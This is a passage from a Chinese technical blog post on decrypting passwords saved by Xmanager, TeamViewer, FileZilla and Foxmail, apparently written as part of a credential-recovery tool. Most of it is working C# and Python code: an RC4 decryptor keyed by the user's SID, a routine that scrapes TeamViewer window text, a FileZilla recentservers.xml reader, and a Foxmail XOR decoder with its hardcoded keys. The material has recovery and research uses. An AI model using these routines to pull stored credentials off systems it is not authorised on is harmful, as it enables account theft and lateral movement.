<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#user+sid</span></span><br><span class="line">RcoIlS<span class="number">-1</span><span class="number">-5</span><span class="number">-21</span><span class="number">-3990929841</span><span class="number">-153547143</span><span class="number">-3340509336</span><span class="number">-1001</span></span><br><span class="line"></span><br><span class="line">SHA<span class="number">-256</span>: <span class="number">5e53</span>a13c5e98d02f8100ce62deb6e0dfec2a2361ba3c7fdd84dceb00554264bb</span><br><span class="line"></span><br><span class="line"><span class="keyword">byte</span>[] Key = &#123;</span><br><span class="line">	<span class="number">0x5E</span>, <span class="number">0x53</span>, <span class="number">0xA1</span>, <span class="number">0x3C</span>, <span class="number">0x5E</span>, <span class="number">0x98</span>, <span class="number">0xD0</span>, <span class="number">0x2F</span>, <span class="number">0x81</span>, <span class="number">0x00</span>, <span class="number">0xCE</span>, <span class="number">0x62</span>,</span><br><span class="line">	<span class="number">0xDE</span>, <span class="number">0xB6</span>, <span class="number">0xE0</span>, <span class="number">0xDF</span>, <span class="number">0xEC</span>, <span class="number">0x2A</span>, <span class="number">0x23</span>, <span class="number">0x61</span>, <span class="number">0xBA</span>, <span class="number">0x3C</span>, <span class="number">0x7F</span>, <span class="number">0xDD</span>,</span><br><span class="line">	<span class="number">0x84</span>, <span class="number">0xDC</span>, <span class="number">0xEB</span>, <span class="number">0x00</span>, <span class="number">0x55</span>, <span class="number">0x42</span>, <span class="number">0x64</span>, <span class="number">0xBB</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
</li>
<li><p>设置了  Master Key 的情况下（5.1 版本之后）</p>
<p>如果设置了 主密码，则以主密码的 <code>SHA-256摘要</code>作为 <code>RC4 加密</code>中使用的密钥。例如：</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Master Key:yingyingying</span><br><span class="line"><span class="keyword">byte</span>[] Key = &#123;</span><br><span class="line">	<span class="number">0x5E</span>, <span class="number">0xF9</span>, <span class="number">0xB6</span>, <span class="number">0x86</span>, <span class="number">0xF8</span>, <span class="number">0xE1</span>, <span class="number">0xCE</span>, <span class="number">0x51</span>, <span class="number">0xCB</span>, <span class="number">0xCD</span>, <span class="number">0xCB</span>, <span class="number">0x2F</span>,</span><br><span class="line">	<span class="number">0xC7</span>, <span class="number">0x2B</span>, <span class="number">0x33</span>, <span class="number">0xB4</span>, <span class="number">0x3B</span>, <span class="number">0x17</span>, <span class="number">0xF3</span>, <span class="number">0xE6</span>, <span class="number">0xE9</span>, <span class="number">0x40</span>, <span class="number">0x23</span>, <span class="number">0x65</span>,</span><br><span class="line">	<span class="number">0x4C</span>, <span class="number">0x68</span>, <span class="number">0xF0</span>, <span class="number">0xB7</span>, <span class="number">0xEC</span>, <span class="number">0xD6</span>, <span class="number">0x59</span>, <span class="number">0xF5</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="3-2-加密过程（C-）"><a href="#3-2-加密过程（C-）" class="headerlink" title="3.2 加密过程（C#）"></a>3.2 加密过程（C#）</h3><p>​        假设我们的密码是 <code>root</code>，则它的 <code>SHA-256 摘要</code>将作为附加加密数据。</p>
 <figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">byte</span>[] Key = &#123;</span><br><span class="line">	<span class="number">0x48</span>, <span class="number">0x13</span>, <span class="number">0x49</span>, <span class="number">0x4D</span>, <span class="number">0x13</span>, <span class="number">0x7E</span>, <span class="number">0x16</span>, <span class="number">0x31</span>, <span class="number">0xBB</span>, <span class="number">0xA3</span>, <span class="number">0x01</span>, <span class="number">0xD5</span>,</span><br><span class="line">	<span class="number">0xAC</span>, <span class="number">0xAB</span>, <span class="number">0x6E</span>, <span class="number">0x7B</span>, <span class="number">0xB7</span>, <span class="number">0xAA</span>, <span class="number">0x74</span>, <span class="number">0xCE</span>, <span class="number">0x11</span>, <span class="number">0x85</span>, <span class="number">0xD4</span>, <span class="number">0x56</span>,</span><br><span class="line">	<span class="number">0x56</span>, <span class="number">0x5E</span>, <span class="number">0xF5</span>, <span class="number">0x1D</span>, <span class="number">0x73</span>, <span class="number">0x76</span>, <span class="number">0x77</span>, <span class="number">0xB2</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<ul>
<li><p><strong><em>Python 版本</em></strong></p>
  <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode, b64decode</span><br><span class="line"><span class="keyword">from</span> Crypto.Hash <span class="keyword">import</span> MD5, SHA256</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> ARC4</span><br><span class="line"></span><br><span class="line">UserSid = <span class="string">"RcoIlS-1-5-21-3990929841-153547143-3340509336-1001"</span></span><br><span class="line">rawPass = <span class="string">"root"</span></span><br><span class="line">cipher = ARC4.new(SHA256.new(UserSid).digest())</span><br><span class="line">checksum = SHA256.new(rawPass).digest()</span><br><span class="line">ciphertext = cipher.encrypt(rawPass)</span><br><span class="line"><span class="keyword">print</span> b64encode(ciphertext + checksum).decode()</span><br><span class="line"></span><br><span class="line">==》 klSqckgTSU0TfhYxu6MB1ayrbnu3qnTOEYXUVlZe9R1zdney</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="3-3-解密过程（C-）"><a href="#3-3-解密过程（C-）" class="headerlink" title="3.3 解密过程（C#）"></a>3.3 解密过程（C#）</h3><ul>
<li><p><strong><em>Python 版本</em></strong></p>
  <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode, b64decode</span><br><span class="line"><span class="keyword">from</span> Crypto.Hash <span class="keyword">import</span> MD5, SHA256</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> ARC4</span><br><span class="line"></span><br><span class="line">UserSid = <span class="string">"RcoIlS-1-5-21-3990929841-153547143-3340509336-1001"</span></span><br><span class="line">rawPass = <span class="string">"klSqckgTSU0TfhYxu6MB1ayrbnu3qnTOEYXUVlZe9R1zdney"</span></span><br><span class="line">data = b64decode(rawPass)</span><br><span class="line">Cipher = ARC4.new(SHA256.new((UserSid).encode()).digest())</span><br><span class="line">ciphertext, checksum = data[:-SHA256.digest_size], data[-SHA256.digest_size:]</span><br><span class="line">plaintext = Cipher.decrypt(ciphertext)</span><br><span class="line"><span class="keyword">print</span> plaintext.decode()</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong><em>C# 版本</em></strong></p>
  <figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">string</span> UserSid = <span class="string">"RcoIlS-1-5-21-3990929841-153547143-3340509336-1001"</span>;</span><br><span class="line"><span class="keyword">string</span> rawPass = <span class="string">"klSqckgTSU0TfhYxu6MB1ayrbnu3qnTOEYXUVlZe9R1zdney"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">byte</span>[] data = Convert.FromBase64String(rawPass);</span><br><span class="line"></span><br><span class="line"><span class="keyword">byte</span>[] Key = <span class="keyword">new</span> SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(UserSid));</span><br><span class="line"></span><br><span class="line"><span class="keyword">byte</span>[] passData = <span class="keyword">new</span> <span class="keyword">byte</span>[data.Length - <span class="number">0x20</span>];</span><br><span class="line">Array.Copy(data, <span class="number">0</span>, passData, <span class="number">0</span>, data.Length - <span class="number">0x20</span>);</span><br><span class="line"><span class="keyword">byte</span>[] decrypted = RC4Crypt.Decrypt(Key, passData);</span><br><span class="line"></span><br><span class="line">Console.WriteLine(<span class="string">"Decrypt: &#123;0&#125;"</span>, Encoding.ASCII.GetString(decrypted));</span><br><span class="line"></span><br><span class="line"> ==》 Decrypt: root</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p><strong>结果如下所示：</strong></p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-08-23_09-32-36.png" alt=""></p>
<p>以上所有测试均为工作组环境，因为在域环境解密失败，原因未知。</p>
<h2 id="0x04-TeamView"><a href="#0x04-TeamView" class="headerlink" title="0x04 TeamView"></a>0x04 TeamView</h2><p>直接是通过获取 <code>TeamView</code> 的句柄，把窗体上所有控件的变量给读出来。</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">bool</span> <span class="title">EnumFunc</span>(<span class="params">IntPtr hWnd, IntPtr lParam</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    StringBuilder sb = <span class="keyword">new</span> StringBuilder(<span class="number">256</span>);</span><br><span class="line">    <span class="keyword">const</span> <span class="keyword">int</span> WM_GETTEXT = <span class="number">0x0D</span>;</span><br><span class="line">    GetClassNameW(hWnd, sb, sb.Capacity);</span><br><span class="line">    <span class="keyword">if</span> (sb.ToString() == <span class="string">"Edit"</span> || sb.ToString() == <span class="string">"Static"</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        WindowInfo wnd = <span class="keyword">new</span> WindowInfo();</span><br><span class="line">        wnd.hWnd = hWnd;</span><br><span class="line">        wnd.szClassName = sb.ToString();</span><br><span class="line">        <span class="keyword">if</span> (wnd.szClassName == <span class="string">"Edit"</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            StringBuilder stringBuilder = <span class="keyword">new</span> StringBuilder(<span class="number">256</span>);</span><br><span class="line">            SendMessage(hWnd, WM_GETTEXT, <span class="number">256</span>, stringBuilder);</span><br><span class="line">            wnd.szWindowName = stringBuilder.ToString();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            GetWindowTextW(hWnd, sb, sb.Capacity);</span><br><span class="line">            wnd.szWindowName = sb.ToString();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//Console.WriteLine("句柄=" + wnd.hWnd.ToString().PadRight(20) + " 类型=" + wnd.szClassName.PadRight(20) + " 名称=" + wnd.szWindowName);</span></span><br><span class="line">        <span class="comment">//add it into list</span></span><br><span class="line">        wndList.Add(wnd);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>为了其兼容性，不对结果进行筛选，输出全部窗体内容信息</p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-08-23_14-40-13.png" alt=""></p>
<h2 id="0x05-FileZilla"><a href="#0x05-FileZilla" class="headerlink" title="0x05 FileZilla"></a>0x05 FileZilla</h2><p>从网上收集的信息得到：</p>
<ul>
<li><p>在 <code>Filezilla 2.X</code> 版本中，密码正在进行异或处理并存储在 Registry 中;</p>
</li>
<li><p>在 <code>Filezilla 3.x</code> 版本中，密码以明文形式存储在 <code>.xml文件</code>中。</p>
<p>  如今官方的最新版本为 <code>FileZilla_3.44.2_win64_sponsored-setup</code>，以此版本进行测试：</p>
<p>  <img src="/image/【编程】SharpDecryptPwd/blog_2019-08-26_09-47-20.png" alt=""></p>
</li>
</ul>
<p>​        直接读取 相关xml 的内容即可（<strong><em>recentservers.xml</em></strong>）</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">fileZilla</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>        &#123;</span><br><span class="line">            <span class="keyword">string</span> FzPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), <span class="string">@"FileZilla\recentservers.xml"</span>);</span><br><span class="line">            <span class="keyword">try</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span> (File.Exists(FzPath))</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">try</span></span><br><span class="line">                    &#123;</span><br><span class="line">                        <span class="keyword">var</span> objXmlDocument = <span class="keyword">new</span> XmlDocument();</span><br><span class="line">                        objXmlDocument.Load(FzPath);</span><br><span class="line">                        Console.WriteLine(<span class="string">"&#123;0,-20&#125;&#123;1,-8&#125;&#123;2,-15&#125;&#123;3,-15&#125;"</span>, <span class="string">"Host"</span>, <span class="string">"Port"</span>, <span class="string">"Username"</span>, <span class="string">"ratPass"</span>);</span><br><span class="line">                        <span class="keyword">foreach</span> (<span class="function">XmlElement XE <span class="title">in</span> (<span class="params">(XmlElement</span>)objXmlDocument.<span class="title">GetElementsByTagName</span>(<span class="params"><span class="string">"RecentServers"</span></span>)[0]).<span class="title">GetElementsByTagName</span>(<span class="params"><span class="string">"Server"</span></span>))</span></span><br><span class="line"><span class="function"></span>                        &#123;</span><br><span class="line">                            <span class="keyword">var</span> Host = XE.GetElementsByTagName(<span class="string">"Host"</span>)[<span class="number">0</span>].InnerText;</span><br><span class="line">                            <span class="keyword">var</span> Port = XE.GetElementsByTagName(<span class="string">"Port"</span>)[<span class="number">0</span>].InnerText;</span><br><span class="line">                            <span class="keyword">var</span> User = XE.GetElementsByTagName(<span class="string">"User"</span>)[<span class="number">0</span>].InnerText;</span><br><span class="line">                            <span class="keyword">var</span> Pass = (Encoding.UTF8.GetString(Convert.FromBase64String(XE.GetElementsByTagName(<span class="string">"Pass"</span>)[<span class="number">0</span>].InnerText)));</span><br><span class="line">                            <span class="keyword">if</span> (!<span class="keyword">string</span>.IsNullOrEmpty(Host) &amp;&amp; !<span class="keyword">string</span>.IsNullOrEmpty(Port) &amp;&amp; !<span class="keyword">string</span>.IsNullOrEmpty(User) &amp;&amp; !<span class="keyword">string</span>.IsNullOrEmpty(Pass))</span><br><span class="line">                            &#123;</span><br><span class="line">                                Console.WriteLine(<span class="string">"&#123;0,-20&#125;&#123;1,-8&#125;&#123;2,-15&#125;&#123;3,-15&#125;"</span>, Host, Port, User, Pass);</span><br><span class="line">                            &#125;</span><br><span class="line">                            <span class="keyword">else</span></span><br><span class="line">                            &#123;</span><br><span class="line">                                <span class="keyword">break</span>;</span><br><span class="line">                            &#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">                    <span class="keyword">catch</span> &#123; &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">catch</span> &#123; &#125;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<p>​        效果如下</p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-08-26_10-17-43.png" alt=""></p>
<h2 id="0x06-Foxmail"><a href="#0x06-Foxmail" class="headerlink" title="0x06 Foxmail"></a>0x06 Foxmail</h2><p><code>Foxmail</code> 将输入的密码和一个固定字符串做异或加密，然后在前面添加字符串 <code>Password</code> ，用于标记作用。</p>
<table><tr><th width="20%" bgcolor="#eea236">版本号 </th><th width="40%" bgcolor="#eea236">存储文件 </th><th width="40%" style="text-align:center" bgcolor="rgb(92," 184,="" 92)="">固定异或字符串(加密密钥)</th></tr><tr><td> Version 6.X </td><td> Account.stg -v6.5</td><td> ~draGon~  第一位异或值：5A</td></tr><tr><td> Version 7.X </td><td> Accounts.tdat -v7.0 Account.rec0 -v7.1</td><td> ~F@7％m$~  第一位异或值：71</td></tr></table>

<p>至于为什么是这个值，可以直接逆向查看，或者看看这篇文章 <a href="https://wenku.baidu.com/view/1fcaf49cda38376baf1faeff" target="_blank" rel="noopener">foxmail 邮箱密码密码原理和方法研究</a>。</p>
<p><strong>Foxmail Version 6.x 加密方法：</strong> </p>
<ul>
<li><p>将原密文的第一位 16进制与 <code>5A</code> 进行 <code>XOR异或</code> 操作，然后替换掉原密文的第一位后，得到一个新密文</p>
  <figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">5</span>A 的由来</span><br><span class="line"><span class="keyword">string</span> key = <span class="string">"~draGon~"</span>;</span><br><span class="line"><span class="keyword">byte</span>[] data = Encoding.Default.GetBytes(key);</span><br><span class="line"><span class="keyword">int</span> x = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; data.Length; i++)</span><br><span class="line">&#123;</span><br><span class="line">	x += <span class="keyword">int</span>.Parse(data[i].ToString());</span><br><span class="line">&#125;</span><br><span class="line">x %= <span class="number">255</span>;</span><br><span class="line">Console.WriteLine(x); <span class="comment">// 90 =&gt; 5A</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>再将新密文从第二位开始分别与密钥 <code>~draGon~</code>（7E647261476F6E7E）进行 <code>XOR异或</code>，并将此时得到的密文与原密文进行相减，得到明文的 16进制。</p>
</li>
<li><p><code>Account.stg</code>  文件使用二进制格式存储并在前 <code>0x800 字节</code>内填充了一些十六进制数据，之后才是真正的账户信息，包括 POP3 和 SMTP 账户、密码。</p>
</li>
<li><p>POP3 和 SMTP 账户密码分别用 “POP3Password” 和 “ESMTPPassword” 来代表。密码使用十六进制格式并用 XOR 异或加密，密钥为“~draGon~”。</p>
</li>
</ul>
<p><strong>版本 7.X 同理。</strong></p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"><span class="doctag">///</span> <span class="doctag">&lt;summary&gt;</span></span></span><br><span class="line">        <span class="comment"><span class="doctag">///</span> Foxmail password decoder</span></span><br><span class="line">        <span class="comment"><span class="doctag">///</span> Credit: Jacob Soo</span></span><br><span class="line">        <span class="comment"><span class="doctag">///</span> https://github.com/jacobsoo/FoxmailRecovery/blob/c3263424dd961ec23868d03c9caad13fa5c017ee/Foxmail%20Password%20Recovery/Foxmail%20Password%20Recovery/SharedFunctions.cs#L72</span></span><br><span class="line">        <span class="comment"><span class="doctag">///</span> https://github.com/lim42snec/foxmaildump/blob/ca29edc6d767b4e52ee939cdad1d0f8cd7c9f626/FoxmailDump.cpp#L34</span></span><br><span class="line">        <span class="comment"><span class="doctag">///</span> <span class="doctag">&lt;/summary&gt;</span></span></span><br><span class="line">        <span class="comment"><span class="doctag">///</span> <span class="doctag">&lt;param name="ver"&gt;</span>版本号<span class="doctag">&lt;/param&gt;</span></span></span><br><span class="line">        <span class="comment"><span class="doctag">///</span> <span class="doctag">&lt;param name="pHash"&gt;</span>密文<span class="doctag">&lt;/param&gt;</span></span></span><br><span class="line">        <span class="comment"><span class="doctag">///</span> <span class="doctag">&lt;returns&gt;</span><span class="doctag">&lt;/returns&gt;</span></span></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">decodePW</span>(<span class="params"><span class="keyword">int</span> ver, String strHash</span>)</span></span><br><span class="line"><span class="function"></span>        &#123;</span><br><span class="line">            String decodedPW = <span class="string">""</span>;</span><br><span class="line">            <span class="comment">// 第一步：定义不同版本的秘钥</span></span><br><span class="line">            <span class="keyword">int</span>[] a;</span><br><span class="line">            <span class="comment">// fc0 的值是根据版本密钥，以字节为单位将16进制密文转成10进制，十进制之和求余。（x %=255;）</span></span><br><span class="line">            <span class="keyword">int</span> fc0;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (ver == <span class="number">0</span>) <span class="comment">// Version 6</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">int</span>[] v6a = &#123; <span class="string">'~'</span>, <span class="string">'d'</span>, <span class="string">'r'</span>, <span class="string">'a'</span>, <span class="string">'G'</span>, <span class="string">'o'</span>, <span class="string">'n'</span>, <span class="string">'~'</span> &#125;;</span><br><span class="line">                a = v6a;</span><br><span class="line">                fc0 = Convert.ToInt32(<span class="string">"5A"</span>, <span class="number">16</span>); <span class="comment">//90</span></span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> <span class="comment">// Version 7</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">int</span>[] v7a = &#123; <span class="string">'~'</span>, <span class="string">'F'</span>, <span class="string">'@'</span>, <span class="string">'7'</span>, <span class="string">'%'</span>, <span class="string">'m'</span>, <span class="string">'$'</span>, <span class="string">'~'</span> &#125;;</span><br><span class="line">                a = v7a;</span><br><span class="line">                fc0 = Convert.ToInt32(<span class="string">"71"</span>, <span class="number">16</span>); <span class="comment">// 113</span></span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 第二步：以字节为单位将16进制密文转成10进制</span></span><br><span class="line">            <span class="keyword">int</span> size = strHash.Length / <span class="number">2</span>; </span><br><span class="line">            <span class="keyword">int</span> index = <span class="number">0</span>;</span><br><span class="line">            <span class="keyword">int</span>[] b = <span class="keyword">new</span> <span class="keyword">int</span>[size];</span><br><span class="line">            <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; size; i++)</span><br><span class="line">            &#123;</span><br><span class="line">                </span><br><span class="line">                b[i] = Convert.ToInt32(strHash.Substring(index, <span class="number">2</span>), <span class="number">16</span>);</span><br><span class="line">                index = index + <span class="number">2</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 第三步：将第一个元素替换成与指定数异或后的结果</span></span><br><span class="line">            <span class="keyword">int</span>[] c = <span class="keyword">new</span> <span class="keyword">int</span>[b.Length];</span><br><span class="line"></span><br><span class="line">            c[<span class="number">0</span>] = b[<span class="number">0</span>] ^ fc0;</span><br><span class="line"></span><br><span class="line">            Array.Copy(b, <span class="number">1</span>, c, <span class="number">1</span>, b.Length - <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 第四步：不断扩容拷贝自身</span></span><br><span class="line">            <span class="keyword">while</span> (b.Length &gt; a.Length)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">int</span>[] newA = <span class="keyword">new</span> <span class="keyword">int</span>[a.Length * <span class="number">2</span>];</span><br><span class="line">                Array.Copy(a, <span class="number">0</span>, newA, <span class="number">0</span>, a.Length);</span><br><span class="line">                Array.Copy(a, <span class="number">0</span>, newA, a.Length, a.Length);</span><br><span class="line">                a = newA;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">int</span>[] d = <span class="keyword">new</span> <span class="keyword">int</span>[b.Length];</span><br><span class="line"></span><br><span class="line">            <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">1</span>; i &lt; b.Length; i++)</span><br><span class="line">            &#123;</span><br><span class="line">                d[i - <span class="number">1</span>] = b[i] ^ a[i - <span class="number">1</span>];</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">int</span>[] e = <span class="keyword">new</span> <span class="keyword">int</span>[d.Length];</span><br><span class="line"></span><br><span class="line">            <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; d.Length - <span class="number">1</span>; i++)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span> (d[i] - c[i] &lt; <span class="number">0</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                    e[i] = d[i] + <span class="number">255</span> - c[i];</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                <span class="keyword">else</span></span><br><span class="line">                &#123;</span><br><span class="line">                    e[i] = d[i] - c[i];</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                decodedPW += (<span class="keyword">char</span>)e[i];</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> decodedPW;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<p>到目前为止，此版本支持 6.5 至 7.2 版的数据恢复，但是这里只是测试了 7.2版本，效果如下</p>
<p><img src="/image/【编程】SharpDecryptPwd/blog_2019-10-11_17-49-10.png" alt=""></p>
<h2 id="来源参考"><a href="#来源参考" class="headerlink" title="来源参考"></a>来源参考</h2><p><a href="https://github.com/DoubleLabyrinth/how-does-navicat-encrypt-password" target="_blank" rel="noopener">https://github.com/DoubleLabyrinth/how-does-navicat-encrypt-password</a><br><a href="http://www.zcgonvh.com/post/SQL_Server_Management_Studio_saved_password_dumper.html" target="_blank" rel="noopener">SQL Server Management Studio密码导出工具</a><br><a href="https://github.com/zcgonvh/SSMSPwd" target="_blank" rel="noopener">https://github.com/zcgonvh/SSMSPwd</a><br><a href="https://github.com/DoubleLabyrinth/how-does-Xmanager-encrypt-password" target="_blank" rel="noopener">https://github.com/DoubleLabyrinth/how-does-Xmanager-encrypt-password</a><br><a href="https://cloud.tencent.com/developer/news/261135" target="_blank" rel="noopener">https://cloud.tencent.com/developer/news/261135</a><br><a href="https://www.t00ls.net/viewthread.php?tid=51996&amp;extra=&amp;highlight=teamview&amp;page=1" target="_blank" rel="noopener">https://www.t00ls.net/viewthread.php?tid=51996&amp;extra=&amp;highlight=teamview&amp;page=1</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
